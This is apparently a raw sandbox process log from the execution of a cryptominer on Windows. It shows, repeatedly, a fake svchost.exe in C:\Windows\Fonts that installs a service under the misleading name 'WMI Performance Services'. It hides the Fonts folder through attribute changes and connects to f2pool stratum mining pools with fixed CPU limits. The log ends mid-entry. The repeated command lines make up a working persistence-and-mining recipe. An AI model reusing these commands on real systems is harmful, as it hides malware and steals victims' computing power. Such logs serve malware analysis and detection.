c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:2568

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:5220

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:5620

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:4308

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:5164

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:5628

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:6604

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:2308

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:6704

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:5160

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4584

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:6256

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:5404

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:3572

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:7036

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:1332

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:6392

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:2960

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3732

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2496

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:5656

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:640

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:6560

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:1124

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:6540

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:6688

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:1556

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:6828

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:6832

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:6928

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:4304

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:5780

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:5960

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:6440

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:6952

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:5048

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:980

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:3116

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:5548

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:1068

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:6028

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:1348

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:5644

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:6720

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:5592

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:6092

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:2860

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:5308

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:580

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:4984

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:6332

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
- Drops file in Windows directory
PID:428

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3240

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:3184

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:3156

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:4524

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:6100

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:392

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:5576

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3964

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:6948

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:2384

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:2268

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:2376

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:6112

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:2256

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:5264

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3976

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:5676

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:5296

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:6988

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:4796

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:5108

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:5276

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:6756

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:6604

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:5268

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:7164

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
- Drops file in Windows directory
PID:5288

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:4588

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:4640

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:5840

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:6920

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:5500

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:6084

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2588

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:5176

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:5920

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:6648

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:2252

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:2884

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3628

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1932

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
- Drops file in Windows directory
PID:6812

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2400

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:4744

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:212

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:1748

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:6340

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:3292

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:6580

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4048

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2596

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:6380

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:6500

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
- Drops file in Windows directory
PID:3960

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:5640

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:3832

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:4084

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:4372

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:5336

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:5272

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:6804

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:6972

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:4896

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:6800

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:6552

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:5048

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:1676

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:1776

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:6200

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:4264

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:6016

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:6860

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3936

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:6364

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:6372

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:4900

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:7080

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:6212

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:1812

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:3988

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3928

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1200

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:5364

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:1156

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:6656

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:1800

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:1248

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:500

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:4344

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:4960

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:1072

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:6168

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:6976

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:4548

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:6108

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:4920

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:6888

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:6504

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:2184

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:5016

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2240

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:5560

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:5412

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:5588

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:5072

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:5396

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:3708

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4944

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1268

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
- Drops file in Windows directory
PID:4424

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:5156

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:5904

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:7064

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:4244

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:1124

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:4760

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:5712

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:3244

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:6568

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:5392

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:5668

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:5492

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:5548

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:5240

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:5644

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
PID:4444

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
PID:5040

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
PID:5384

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
PID:304

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:2596

C:\Windows\System32\Conhost.exe
